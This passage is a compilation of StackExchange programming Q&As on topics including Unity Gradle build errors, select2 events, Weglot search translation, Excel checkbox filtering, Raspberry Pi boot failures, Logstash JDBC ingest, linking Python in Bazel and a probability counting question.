$/file:////$.replace("\\", "/") maven { url "https://maven.google.com/" // Assets/GoogleMobileAds/Editor/GoogleMobileAdsDependencies.xml:7, Assets/GoogleMobileAds/Editor/GoogleUmpDependencies.xml:7 } mavenLocal() // Android Resolver Repos End flatDir { dirs "${project(':unityLibrary').projectDir}/libs" } } } As shown in the file, it doesn't contain the argument Gradle, but it seems to have a GoogleMobileAds library. Is this normal?? What is missing?? One more thing, there is an extended version of the problem here: CommandInvokationFailure: Gradle build failed. 
C:\Program Files\Unity\Hub\Editor\2021.2.6f1\Editor\Data\PlaybackEngines\AndroidPlayer\OpenJDK\bin\java.exe -classpath "C:\Program Files\Unity\Hub\Editor\2021.2.6f1\Editor\Data\PlaybackEngines\AndroidPlayer\Tools\gradle\lib\gradle-launcher-6.1.1.jar" org.gradle.launcher.GradleMain "-Dorg.gradle.jvmargs=-Xmx4096m" "bundleRelease" stderr[ FAILURE: Build failed with an exception. * Where: Settings file 'C:\Users\educp\Documents\Proyectos de unity\It's Complicated - copia\Library\Bee\Android\Prj\IL2CPP\Gradle\settings.gradle' line: 14 * What went wrong: A problem occurred evaluating settings 'Gradle'. > Could not find method dependencyResolutionManagement() for arguments [settings_9y2goy45mvwak9gvumvg94pgc$_run_closure1@4aecf086] on settings 'Gradle' of type org.gradle.initialization.DefaultSettings. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at https://help.gradle.org BUILD FAILED in 3s Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8 ] stdout[ Starting a Gradle Daemon, 1 incompatible Daemon could not be reused, use --status for details ] exit code: 1 UnityEditor.Android.Command.WaitForProgramToRun (UnityEditor.Utils.Program p, UnityEditor.Android.Command+WaitingForProcessToExit waitingForProcessToExit, System.String errorMsg) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.Command.Run (System.Diagnostics.ProcessStartInfo psi, UnityEditor.Android.Command+WaitingForProcessToExit waitingForProcessToExit, System.String errorMsg) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.Command.Run (System.String command, System.String args, System.String workingdir, UnityEditor.Android.Command+WaitingForProcessToExit waitingForProcessToExit, System.String errorMsg) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.AndroidJavaTools.RunJava (System.String args, System.String workingdir, System.Action`1[T] progress, 
System.String error) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.GradleWrapper.Run (UnityEditor.Android.AndroidJavaTools javaTools, Unity.Android.Gradle.AndroidGradle androidGradle, System.String workingdir, System.String task, System.Action`1[T] progress) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) Rethrow as GradleInvokationException: Gradle build failed UnityEditor.Android.GradleWrapper.Run (UnityEditor.Android.AndroidJavaTools javaTools, Unity.Android.Gradle.AndroidGradle androidGradle, System.String workingdir, System.String task, System.Action`1[T] progress) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessor.Tasks.BuildGradleProject.Execute (UnityEditor.Android.PostProcessor.PostProcessorContext context) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessor.PostProcessRunner.RunAllTasks (UnityEditor.Android.PostProcessor.PostProcessorContext context) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) Rethrow as BuildFailedException: Exception of type 'UnityEditor.Build.BuildFailedException' was thrown. 
UnityEditor.Android.PostProcessor.CancelPostProcess.AbortBuild (System.String title, System.String message, System.Exception ex) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessor.PostProcessRunner.RunAllTasks (UnityEditor.Android.PostProcessor.PostProcessorContext context) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessAndroidPlayer.PostProcess (UnityEditor.Modules.BuildPostProcessArgs args, AndroidPlayerBuildProgram.Data.AndroidPlayerBuildProgramOutput buildProgramOutput) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.AndroidBuildPostprocessor.PostProcess (UnityEditor.Modules.BuildPostProcessArgs args, UnityEditor.BuildProperties& outProperties) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.PostprocessBuildPlayer.Postprocess (UnityEditor.BuildTargetGroup targetGroup, UnityEditor.BuildTarget target, System.Int32 subtarget, System.String installPath, System.String companyName, System.String productName, System.Int32 width, System.Int32 height, UnityEditor.BuildOptions options, UnityEditor.RuntimeClassRegistry usedClassRegistry, UnityEditor.Build.Reporting.BuildReport report) (at <52409df47eec4ff4a3e5a5be37682d54>:0) UnityEngine.GUIUtility:ProcessEvent(Int32, IntPtr, Boolean&) Does this answer your question? gradle error Could not find method dependencyManagement() One solution is to use Unity 2022.3 or higher. For older versions, you will need to do the following: Go to Assets/Plugins/Android directory and delete gradleTemplate, mainTemplate and settingsTemplate files. (Or move somewhere as backup). Go to Edit -> Project Settings... -> Player Open Android tab and then open Publishing Settings Tick Custom Main Gradle Template and Custom Gradle Properties Template Assets -> External Dependency Manager -> Android Resolver -> Force Resolve You most likely opened a project that was created in a newer Unity version. 
Your Unity 2021.2.6f1 depends on a very old Gradle version that doesn't have dependencyResolutionManagement(). By deleting the Gradle templates and generating them again, Unity will generate templates that are correct for the current version. dependencyResolutionManagement was added in Gradle 6.8 and your Unity version uses Gradle 6.1.1 (source).
This is helpful!! Look, what happened is that the first version of the project was in 2021.2.6f1, but then I decided to upgrade to 2022.3.15f1. The thing is that some time later I installed an external library asset, and when I wanted to build for the first time in the latest version it started to give me another error. So I moved the 2022.3 project back to 2021.2.6f1 just to see if that solved my problem, but as you see it doesn't help. Happily, I made a backup of the 2022.3 version so I can send you the error I get, but I don't know where to send it because the message is too long.
Try doing the same. Delete the 'Template' files from Assets/Plugins/Android and then regenerate them from Settings. Older Unity versions cannot upgrade Gradle templates automatically, and this needs to be done every time Unity changes its Gradle configuration files. If it doesn't help and the error is different, you can create a new question and leave a link to it.
I just followed your steps and it gave me a new error, but I think it is much more readable. The link is here. It says that I have to add some code to the build.gradle file, but I'm not quite sure if this is what is needed. I want to thank you for helping me with this and I would be very pleased if you could read the post.
Go to Unity -> Edit -> Preferences and make sure that the Gradle used is the one installed with Unity (or newer). In my case, although I had a clean new Unity install, the checkbox for Gradle was unchecked and pointing to an older Gradle from an older project I have.
common-pile/stackexchange_filtered
How do I check Approvals != null in a formula field on the Quote object in Salesforce How do I check, in a formula field on the Quote object, whether Approvals != null? I can see in the related list that there are 2 Approvals. This cannot be done with a formula alone, since formulas have no way to access child records. Some other component (process builder, trigger, workflow rule with a cross-object field update, rollup summary field) would be required to get the data onto your parent record (Quote, in this case). Hi @derek, thanks for the explanation.
Mercurial Queues, patch is getting auto applied I have two patches: patch1 patch2 When I apply patch1, that is the only thing that gets applied. When I do hg qpop and then do hg qpush patch2, for some reason patch1 gets applied too. How can I make them independent from each other? You need to use the --move option for that. For example: hg qpush --move patch2 This will apply only patch2, but not any patches on top of it.
select2 - Get the value of the clicked box In my Select2 multi-select boxes I want to be able to click on the selected boxes and get their corresponding option value (or object). This is (in a nutshell) what I have so far: $('#mySelect2').next('span').find('ul').on('click', '.select2-selection__choice', function (e) { console.log($('#mySelect2').select2('data')); alert($(this).data('select2-id')); }); I searched the select2 data objects but there is nothing related to the clicked box, and the select2-id data attribute seems to be random. Where can I find a matching id?
I think I've found a workaround solution. It seems that select2 uses the title attribute in the rendered list. So the trick is to use this attribute as an id in each option. <select multiple id="states" name="states[]" class="select2"> <option title="states-AL" value="AL">Alabama</option> <option title="states-CA" value="CA">California</option> <option title="states-MI" value="MI">Michigan</option> <option title="states-UT" value="UT">Utah</option> <option title="states-WY" value="WY">Wyoming</option> </select> $('#states').next('span').find('ul').on('click', '.select2-selection__choice', function (e) { alert($(this).attr('title')); });
You can try the code below, using the select2:select and select2:unselect events. $("#mySelect2").on("select2:select select2:unselect", function (e) { //get all items; for multiple select an array like ["9", "20"] will be returned var items = $(this).val(); //Last selected value var lastItem = e.params.data.id; })
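A minimal sketch (plain JavaScript, DOM aside) of the reverse lookup the title-as-id workaround relies on — mapping the rendered title attribute back to the option value. The option data below is made up to mirror the states example:

```javascript
// Hypothetical option data mirroring the <select> above; each rendered
// choice in select2 carries its option's title attribute.
const options = [
  { title: "states-AL", value: "AL", text: "Alabama" },
  { title: "states-CA", value: "CA", text: "California" },
  { title: "states-MI", value: "MI", text: "Michigan" },
];

// Build a title -> value map once, then resolve clicked choices through it.
const byTitle = new Map(options.map(o => [o.title, o.value]));

function valueForClickedChoice(titleAttr) {
  // Returns the option value for a rendered choice's title, or null.
  return byTitle.get(titleAttr) ?? null;
}

console.log(valueForClickedChoice("states-CA")); // "CA"
```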
Translate back to English before sending the search parameter using Weglot I am using Weglot in my single-page application (Angular). The following code adds a language switcher to my application on all pages. <script type="text/javascript" src="https://cdn.weglot.com/weglot.min.js"></script> <script> Weglot.initialize({ api_key: 'YOUR_API_KEY' }); </script> Initially, the application is rendered in English and the user can switch it to any other language using the language switcher. Now, there is some data displayed in an Angular grid that has a search option to perform a server-side search. Let's say the user has switched from 'English' to 'French'. There is a word 'Submitted' which is translated to 'Soumis'. The user is trying to search for the word 'Soumis' in the search box. As soon as the user stops typing, an API call is sent to the server to fetch the results according to the search criteria. I want to translate 'Soumis' back to 'Submitted' before making the API call. Weglot provides an API for doing this via the translate function. Weglot.translate( { 'words':[ { "t":1,"w": "Soumis" } ], 'languageTo':'en' } , function(data) { console.log(data) } ); Now here comes the tricky part. The search is triggered when the user types in at least 3 characters and then stops typing. Let's say the user started typing 'Sou', which should match the word 'Soumis' in French, but if I translate 'Sou' back to English, it translates it to 'Penny' instead of matching a substring of 'Submitted'. Now I think I cannot rely on the translate function; instead, I should build custom logic to achieve this. When I change the language from the language switcher, I can see in the 'Network' tab that there is an XHR call to the Weglot server which takes the original text as input and returns the original and translated text as output. If I get control of this response and manage to store it in local storage then I can write the custom logic. 
Now if the user searches for 'Sou', I can find this in the saved response's translated array. If any match is found, I can find its original word and send that to the API. So in short, I am looking for a solution provided by Weglot to handle this. If not, then share a few pointers on how to store the response from the API call which is triggered on change of language from the switcher. I am also open to switching to any other tool like 'Lokalise' if they provide a solution to this. Isn't it better to give suggestions to the user for their input in this case with an autocomplete, so that they enter the actual word instead of a shortened version of it, with the suggestions changing based on the language of the website? @CanGeylan, this is not an autocomplete input box so I cannot give suggestions to the user. Even if I make an autocomplete input box, the challenge will remain the same. If the user is searching for 'Sou' then I have to suggest 'Soumis', which is not possible because Weglot doesn't provide an object having all translations which can be used for searching. Any idea how I can access the response of the API (Weglot API) which gets called on change of the language? Are you still experiencing the same issue with the translate search method? If you do, as you may already know, the Search feature actually works as a "Translate Back", so the default search system (in the original language) always takes care of the Search feature. You can notice that the feature works when you have, in your Translation List, translations from your translated language to your original one. For instance, you manage a site in English with a French translation. If the original content is "Hello", Weglot generates the translation "Bonjour" for the French translation. By searching for the word "Bonjour", for example, Weglot will translate the word "Bonjour" from French to English. 
There will therefore be, in the Translation List, a language pair FR > EN to translate back the word of the search (in addition to the language pair EN > FR). NB: Weglot's "translate back" must match the original word! For example, by searching for the word "Hello", Weglot could create a translation "Hi" and not "Hello". The search would therefore not be able to match the "Hello" with the "Bonjour". In this case, by editing the translation "Hi" to "Hello", the search system would work. In your case, maybe the Weglot.search() function could be helpful. I'm pleased to send you below the documentation related to this function: https://developers.weglot.com/javascript/javascript-functions#weglot.search-term-callback-boolean In this function you can submit a string as an argument, and the function will return true if you're currently navigating on a translated version. The search query will then be submitted and stored in your Translation List, in the searched language pair, i.e. the language pair from your translated language to your original language. Can this method help you submit the search query only once the query is entirely entered? See an example here: Weglot.search("searched query", function(data) { console.log(data) })
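The custom prefix-matching logic the asker describes — cache the original/translated pairs observed when the language changes, match the user's partial input against the translated words, and send the originals to the API — could be sketched like this. The pair data and function names are hypothetical, not part of Weglot's API:

```javascript
// Hypothetical cached response from the translation call, stored (e.g. in
// localStorage) when the visitor switches language: original -> translated.
const pairs = [
  { original: "Submitted", translated: "Soumis" },
  { original: "Rejected",  translated: "Rejeté" },
];

// Return the original-language words whose translation starts with the
// partial search text, so the server-side search can run in English.
function originalsForPrefix(partial) {
  const p = partial.toLowerCase();
  return pairs
    .filter(x => x.translated.toLowerCase().startsWith(p))
    .map(x => x.original);
}

console.log(originalsForPrefix("Sou")); // ["Submitted"]
```

With this, typing 'Sou' resolves to 'Submitted' by substring match rather than by machine translation, avoiding the 'Penny' problem.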
How do I copy multiple rows to another sheet based on selection with checkboxes in Excel? This is a screen clip of 2 sheets in Excel 2013. What I am trying to do is that if the checkbox corresponding with the row is checked, the text in the row shows up in the second sheet. There will be around 75 rows of text with checkboxes. Some number of these will be checked, and for each one checked, the text should show up on the second sheet (with the displayed rows contiguous; all of the text cells for the row copied but not the checkbox). I have gotten as far as inserting the checkbox, assigning it to a column to show true/false that I will hide later, and trying to use a VLOOKUP. The problem is it just outputs the first value checked. What I need help with is making this work for multiple checkboxes. When I input it with multiple IF functions, it only shows the output for the first checked box and nothing past it. I have tried formulas such as: =VLOOKUP(TRUE,TEKS!$A$2:$K$77,4) or =IF(VLOOKUP(TRUE,TEKS!$A$2:$K$77,4)=A1,VLOOKUP(TRUE,OFFSET(TEKS!$A$2:$K$77, 1, 0),4)) These I know do not work, but they are my best attempts. I figure that if I am able to get the cells from column D of the first sheet, I can get the other columns with an if statement. Please explain more precisely what result you want and show what you have tried (and tell us exactly what result that is giving you). It is hard to envision your problem from the description. Can you post a screenshot somewhere with a link here? https://dl.dropboxusercontent.com/u/78552577/excel%20question.pdf In the link it shows a screen clip of 2 sheets. What I would like is that if the checkbox corresponding with the row is checked it shows up in the second sheet. I have got as far as inserting the checkbox, assigning it to a column to show true false that I will hide later, and trying to use a VLOOKUP. The problem is it just outputs the first value checked. I want it to paste the row in the new sheet. 
Sorry if this is not clear; I am very new to excel Thanks @Clayjoe: It looks like the bottom half of the image is supposed to be the results you're currently getting. Your description sounds like you got farther than that. Can you add samples of your formulas to the question? Can I assume that the goal is for the copied rows to be contiguous on the output (if you have say five random rows checked, those will be the first five rows on the output sheet, as opposed to a duplicate of the sheet except the 70 unchecked rows are hidden in place)? BTW, you need to "address" comments like I did on this one or nobody will be aware of your posting. In your example, you have three columns of text. Do you want to carry the same structure to the output, or are you looking to have it all consolidated into one cell for the row? The type, length, and internal structure of the text would make it impractical to try to retain that if you combine it into a single cell. @fixer1234 : I believe you understand what I am trying to do perfectly. The formula I am trying to use is as such:=VLOOKUP(TRUE,TEKS!$A$2:$K$77,4) or =IF(VLOOKUP(TRUE,TEKS!$A$2:$K$77,4)=A1,VLOOKUP(TRUE,OFFSET(TEKS!$A$2:$K$77, 1, 0),4)). These I know do not work, but they are my best attempts. I do not need them in one cell; I figure that if I am able to get the cells from column D of the first sheet, I can get the other columns with an if statement. And thank you for the tip about addressing comments. @Clayjoe: I've got to run but I'll leave a few hints to get you started. There are many ways to approach this. You can sort or filter based on the checkbox and then copy and paste. This Q&A might help: http://superuser.com/questions/873257/how-do-i-copy-list-to-another-spreadsheet-only-if-items-have-been-paid/873261#873261 or http://superuser.com/questions/219125/how-do-i-select-a-set-of-specific-cells-and-then-copy-their-entire-row. This approach is "one-time", you do it once after all selections have been made. cont'd... 
This might also be helpful: http://superuser.com/questions/833255/how-can-i-create-a-list-in-sheet1-made-up-of-selections-on-sheet2-in-excel. You can pre-populate formulas in the second sheet that detect relevant selections based on the checkmarks and display the text. This approach will remain blank until there is something to display and then fill in sequential rows as needed. If you add checkmarks anywhere, it will auto-update. This link isn't a canned solution but it describes the approach: http://superuser.com/questions/817400/i-need-help-for-a-quote-form-i-am-creating. Another: VBA. @fixer1234: That did the trick. Thanks for your help and patience. I copied all of the "master" sheet except the check marks and True/False columns. I made a new column with a simple "='master'!A1" formula for the T/F column from the "master" and did a filter on the new column. This worked for one-time filtering, which is not what I wanted, so I searched the web and found some code that auto-refreshes the filter whenever there is a change to the sheet. And that worked great, although I do not like adding code if I can help it. Thanks again. @FIXER1234: Update: I ditched the Filter, because it had to use macro code and could not be put into a drop-down list. I ended up using this formula: =IFERROR(INDEX($E$2:$E$73, AGGREGATE(15,6,(ROW($E$2:$E$73)-ROW($D$2)+1)/($E$2:$E$73<>""),ROWS(I$2:I2))),"") many, many times in order to receive the correct information and consolidate it into a nice column where I could make a list, put the info into one column, and show the info on its own sheet without the user needing to know. https://www.youtube.com/watch?v=6PcF04bTSOM this is where I found this formula. Thanks again for all your help. @Clayjoe: If you're ambitious, consider writing up your solution as an answer for others who have a similar problem. Try to use a hidden row/column where you evaluate the individual "X"s and if "true" place a text you like to see for each. 
Then on the result cell, you just combine the output: Row example: =A1 & B1 & C1 ... -or- Column example: =A1 & A2 & A3 ... UPDATE (to address comment): The "IF" function has three parameters, two of which are optional =IF(criteria [, true statement][, false statement]) If you do not include any of the optional statements it will return the words TRUE or FALSE depending on the outcome. So, if you would like to have a specific text returned, you need to put it in surrounded by quotation marks. If you want to have nothing returned (e.g. when the criteria is not met), you can use an empty string: =IF(B1="ABC", "X", "") This will return "X" whenever "B1" is filled with the text "ABC" (true statement). For any other value in cell "B1", it will return an empty string (false statement). If you pick it up with the row or column example, it will return exactly what is in there. Let's say "A1" is true, "B1" is not, and "C1" is again true. Using "ABC" for "A1", "DEF" for "B1" and "GHI" for "C1", it will return "ABCGHI". I think this is what I am trying to do; however, I do not know the formula that would show the row if TRUE and leave it if it shows FALSE, and then go on to the next row and not just add the same row over and over. I have tried vlookup, offset, and if functions, and I am doing something wrong. I updated my response to address your comment.
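The INDEX/AGGREGATE formula mentioned above packs checked rows into contiguous output rows. Its logic, sketched in Python for clarity (the row data is made up):

```python
# Each row: (checked, text) -- mirroring the TRUE/FALSE helper column
# and one text column on the master sheet.
rows = [
    (True,  "Row 1 text"),
    (False, "Row 2 text"),
    (True,  "Row 3 text"),
    (False, "Row 4 text"),
    (True,  "Row 5 text"),
]

def packed_checked_rows(rows):
    """Return the text of checked rows, contiguously, in sheet order --
    what INDEX + AGGREGATE(15, 6, ...) computes one output row at a time."""
    return [text for checked, text in rows if checked]

print(packed_checked_rows(rows))  # ['Row 1 text', 'Row 3 text', 'Row 5 text']
```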
Green LED blinks 4 times, did I brick my Pi? Out of nowhere my pi stopped booting. The red led lights up, then a long flash of the green led and then a cycle of 4 green blinks. HDMI screen shows nothing. I tried this with two different SD cards, the second one is brand new, flashed with vanilla "2013-09-25-wheezy-raspbian". This page says that 4 blinks mean "start.elf not launched" and that "If start.elf won't launch, it may be corrupt." but the image I'm using seems fine. I've also tried replacing start.elf with the one from github with the same result. Multimeter between tp1 and tp2 shows 4.91V. Tried setting hdmi_safe=1 in config.txt but nothing changed. Have I bricked my pi? What else can I try? Correct me if I'm wrong, but you probably haven't bricked it, but instead shorted it out, which may mean that you will need to buy another pi. @zeldarulez That's very possible... but what could I have shorted out? what do I look for? Which action of yours brought the Pi to this situation? (If you tell us, we will know not to do that.) I mean things like drawing overcurrent from the pins, over-supplying power, etc. Try testing tp1 and tp2 for Ohms. If there is a short it will be 0 ohm or very close to it. Has your problem been solved? If so, please create a self-answer (click "Answer" and paste in your solution). We are working on a project to get the RPi SE up to par and it requires answers to be marked. For me, I was using a 256 GB SD, and it was too large. Everything worked again on the 32GB and 64GB SD cards I tried. The solution: go to the store I bought it, get a new board :) This is not Apple, this was just a configuration issue. Given the other answers available here, it would be really helpful if this was not marked as the accepted answer, as it would improve this question from a search optimization perspective. The answer to another question: Won't boot after removing and inserting the SD Card? 
That answer suggests that four green flashes indicates that loader.bin failed to launch, rather than start.elf. Have you checked that for corruption? Have you read the question asked before posting your answer? For me the problem was caused by my removing the line start_x=1 from the /boot/config.txt file, and in my firmware there is the file /boot/start_x.elf and not /boot/start.elf. I solved it by removing the SD card, loading it in an adapter and restoring the line in the config.txt file with my laptop. The problem is your SD card corrupted after doing some type of update to the system. Happened to me when I updated an addon then cancelled it. Just reformat it then reinstall the OS. I don't think that you have bricked your Raspberry Pi, it's very resistant to misbehavior. I had this same behavior on one of my Raspberry Pi's. Do you use two different SD cards? If you do, try an older image (before 2013-09-25). Also try the newest version. Are you using a Raspberry Pi made in the UK? If so, it might have these problems you describe. Are you using a Raspberry Pi with a Samsung or NOOBS SD card adapter? If so, it might have these problems you describe. I think the best way to fix this (without buying new stuff) is to find an image before 2013-09-25. You may find this post interesting. I don't see how using an older image would help, or why a Raspberry Pi made in the UK would be a problem... it makes sense, because I actually had exactly this problem, where an RPi from the UK did not accept an SD card adapter, but an RPi made in China did. An older image is more of a thing to try. 4 flashes means that loader.bin was not launched. This is what Chenmunka suggested in the top answer; do you have any additional information you could add to differentiate your answer?
Ingest data from SQL Server using Logstash - batches or not, and is "ORDER BY" in the (SQL) statement required? We are loading product data using Logstash from SQL Server to Elasticsearch. Our products have a ChangeId, a number which is sequentially increased on updates to the product data. In our development process we sometimes 'change' all the records to reindex all data. I'm curious what the best way is to form the (SQL) statement. The underlying question is how much is handled by Logstash or not. To give some context, here is a small, simplified part of the pipeline: use_column_value => true tracking_column => "ChangeId" statement => " SELECT * FROM [Uni].[TPProducts] WHERE [ChangeId] > :sql_last_value" lowercase_column_names => "false" When all of, say, 20,000,000 records are changed, this query will be heavy due to JSON generation in the [Uni].[TPProducts] view. I have these (somewhat open) questions: While running, we see the index growing and the query still active as a process/session on SQL Server. To me this implies something is sort of streaming (which is desired). Maybe this is related to the JDBC driver, but I don't know how to find out the facts. The sql_last_value on disk mostly does not change while running, but one time we think we saw the number set to 1,000,000 mid-run. When we 'kill' the pipeline, data is ingested but the sql_last_value is not updated. Do we need an "order by" in this statement (ORDER BY [ChangeId]) or is this all managed by Logstash? Is working with batches (and consequently including the ORDER BY clause) a better approach for large sets?
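No answer is recorded here, but for large re-syncs the jdbc input's paging options are worth testing: with paging enabled the plugin wraps the statement in its own paged queries, and an explicit ORDER BY on the tracking column keeps the pages deterministic. A sketch (option names from the logstash-input-jdbc plugin; verify them against your plugin version):

```
jdbc {
  # Paged fetches instead of one huge result set (the plugin wraps the query).
  jdbc_paging_enabled => true
  jdbc_page_size => 100000
  use_column_value => true
  tracking_column => "ChangeId"
  # Explicit ordering keeps pages deterministic and sql_last_value monotonic.
  statement => "SELECT * FROM [Uni].[TPProducts] WHERE [ChangeId] > :sql_last_value ORDER BY [ChangeId]"
  lowercase_column_names => "false"
}
```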
Can a JsonGenerator write to an OutputStream and Writer in the same call? Is there an elegant solution or pattern so that one invocation of writeStartObject() can be applied to both the Writer and the OutputStream? try ( JsonGenerator output = jfactory.createGenerator(outputWriter); // writer JsonGenerator cachingOutput = jfactory.createGenerator(cachingService.getCachingOutputStream(id));//outputstream ) { output.writeStartObject(); cachingOutput.writeStartObject(); ... I guess you can use the facade design pattern. But I think that is more overhead and does not bring much more readability. You may want to consider whether these two really should be bound together as there are cohesion and coupling guidelines to consider. For example, if you need to use the writer or the outputStream for other uses and to an extensive degree then you should keep them separate unless this extensive use is reflected across both of them equally. It may be better to hide both of these behind two independent Data Access Objects where their use can be compartmentalized, exposing their operations in a descriptive manner based on the purpose for accessing them - a little more suited to your business. Whether it's limited use or extensive use, for equal use across the pair I might apply a façade as such: class SimultaneousFeed { private JFactory jFactory; private JsonGenerator out; private JsonGenerator writer; SimultaneousFeed(JFactory jFactory, OutputStream outputStream, Writer outputWriter) { this.jFactory = jFactory; this.out = jFactory.createGenerator(outputStream); this.writer = jFactory.createGenerator(outputWriter); } void writeStartObject() { out.writeStartObject(); writer.writeStartObject(); } ... // other operations common to the pair of these outputs } ... 
SimultaneousFeed feed = new SimultaneousFeed(jFactory, cachingService.getCachingOutputStream(id), outputWriter); feed.writeStartObject(); Note that I'm passing the OutputStream to the new SimultaneousFeed instance rather than passing the id. Passing the id raises the data coupling in the new instance - the id is a piece of data the SimultaneousFeed should know nothing about. This allows the SimultaneousFeed to concern itself with only output data, improving reusability and maintainability. An alternative pattern to consider would be the Decorator pattern, provided you're able to subclass the class of the jfactory instance and the JsonGenerator class. This would allow you to create a custom JsonGenerator that simultaneously writes to the two outputs in an overridden implementation of the writeStartObject() method. In that case, you could provide a method in the jfactory class: public JsonGenerator createSimultaneousGenerator(OutputStream outputStream, Writer outputWriter) { return new SimulJsonGenerator(outputStream, outputWriter); }
Should I drop a variable that has the same value in the whole column for building machine learning models? For instance, column x has 50 values and all of these values are the same. Is it a good idea to delete variables like these for building machine learning models? If so, how can I spot these variables in a large data set? I guess a formula/function might be required to do so. I am thinking of using nunique, which can take account of the whole dataset. You should be deleting such columns because they provide no extra information about how each data point is different from another. It's fine to leave the column in for some machine learning models (due to the nature of how the algorithms work), like random forest, because such a column will simply not be selected to split the data. To spot those, especially for categorical or nominal variables (with a fixed number of possible values), you can count the occurrence of each unique value, and if the mode's share is larger than a certain threshold (say 95%), then you delete that column from your model. I personally will go through variables one by one if there aren't many, so that I can fully understand each variable in the model, but the above systematic way is possible if the feature size is too large.
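The mode-share rule described above (drop a column when one value accounts for at least, say, 95% of rows) can be sketched in plain Python; with pandas you would get the same top frequency from df[col].value_counts(normalize=True). The data and function name below are made up:

```python
from collections import Counter

def near_constant_columns(table, threshold=0.95):
    """Column names where the most common value covers >= threshold of rows."""
    flagged = []
    for name, values in table.items():
        top_count = Counter(values).most_common(1)[0][1]
        if top_count / len(values) >= threshold:
            flagged.append(name)
    return flagged

# Toy data: 'x' is constant (the case from the question), 'y' varies.
table = {
    "x": ["a"] * 50,
    "y": ["a", "b", "c", "d", "e"] * 10,
}
print(near_constant_columns(table))  # ['x']
```

A fully constant column is just the extreme case (mode share = 100%), so the same check covers both.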
common-pile/stackexchange_filtered
Compile C++ file with Python.h import using Bazel I want to compile a C++ file which uses Python embedding. Therefore I #include in my C++ source. When using g++ as compiler I would specify the following flags: g++ -o pybridge pybridge.cc -I/usr/include/python2.7/ -lpython2.7 I want to use Bazel for compilation now and tried the following target rule: cc_binary( name = "pybridge", srcs = ["pybridge.cc"], copts = ["-I/usr/include/python2.7/"], linkopts = ["-lpython2.7"] ) Running bazel build gives error messages like this: pybridge.cc:(.text+0x10): undefined reference to Py_Initialize Can you send the output of bazel -s to see the command? Also what happens if you build without sandboxing (--spawn_strategy=standalone)? Do you know where is the libpython2.7.so on the file system? Bazel executes your build in a sandbox, to prevent it from accessing random resources on your system that won't be present on, say, your coworker's system. This means that, unless you've declared a file (like the Python library) as a dependency, Bazel won't put it in the sandbox and your build won't be able to find it. There are two options: The easy one is to build with --spawn_strategy=standalone (bazel build --spawn_strategy=standalone :pybridge). This tells Bazel not to use sandboxing for this build. Note that, as far as Bazel knows, nothing has changed between the sandboxed and non-sandboxed run, so you'll have to clean before re-running without sandboxing, or you'll just get the cached error. The harder option is to declare /usr/lib/libpython2.7.so as an input to your build. 
If you want to do that, add the following to the WORKSPACE file: local_repository( name = "system_python", path = "/usr/lib/python2.7/config-x86_64-linux-gnu", # Figure out where it is on your system, this is where it is on mine build_file_content = """ cc_library( name = "my-python-lib", srcs = ["libpython2.7.so"], visibility = ["//visibility:public"], ) """, ) Then in your BUILD file, instead of linkopts = ["-lpython2.7"], add deps = ["@system_python//:my-python-lib"]. Then Bazel will understand that your build depends on libpython2.7.so (and include it in the sandbox). (Tried commenting on OP's post but I lack the required karma.) FWIW, I've had problems linking against Python 2.7's libraries (on Windows), even when I didn't use Bazel but ran the linker manually, so this problem may be unrelated to Bazel.
Probability of ordered sequence There are 3 squares, 5 triangles, and 4 circles. I need to generate possibilities of certain sequences if they are randomly generated. What is the probability that all the squares are grouped, next all the triangles, then all the circles? What is the probability that all the shapes will be grouped together (all squares together, etc.) What is the probability that all the squares are grouped (everything else is random) I think the number of sequences for the second one is 3!5!4! = 17280 What you got is actually the number of possibilities for the first question. It's like having: 3S 2S 1S 5T 4T 3T 2T 1T 4C 3C 2C 1C S meaning square, T meaning triangle and C meaning circle. In the first slot, you have 3 possibilities (there are 3 squares), then there are 2 possibilities left for the second spot and so on. And the total number of possibilities without restriction is $(3+5+4)! = 12!$. Can you work out the probability for the first question with that? For the second question, it's very similar to the first, except that you can have triangles first, or circles first, meaning there are more possibilities. For this, you can treat each group as 1 unit. With this, you get 3 units: 1 set of squares, 1 for triangles and 1 for circles. The number of ways to arrange them becomes $3!$. Now, within each group, the shapes can be shuffled. For the squares: $3!$, for the triangles $5!$ and for the circles $4!$. This gives: $3!3!5!4!$. For the third question, you need to treat the squares as a single block. This gives you one big block for squares and 9 other shapes (5 being triangles and 4 being circles) for a total of 10 items. Thus, the number of ways you can arrange them is $10!$. On top of that, the squares can shuffle between themselves within the set of squares, so you get $3!$. The total number of ways hence is $10!3!$. Can you work out the respective probabilities?
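Working the hinted arithmetic through as a check on the counts above, using exact fractions:

```python
from fractions import Fraction
from math import factorial as f

total = f(12)  # all orderings of the 12 shapes

# Q1: squares first, then triangles, then circles (one fixed group order)
p1 = Fraction(f(3) * f(5) * f(4), total)

# Q2: the three groups each together, in any of the 3! group orders
p2 = Fraction(f(3) * f(3) * f(5) * f(4), total)

# Q3: only the squares together -- treat them as one block among 10 items
p3 = Fraction(f(10) * f(3), total)

print(p1, p2, p3)  # 1/27720 1/4620 1/22
```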
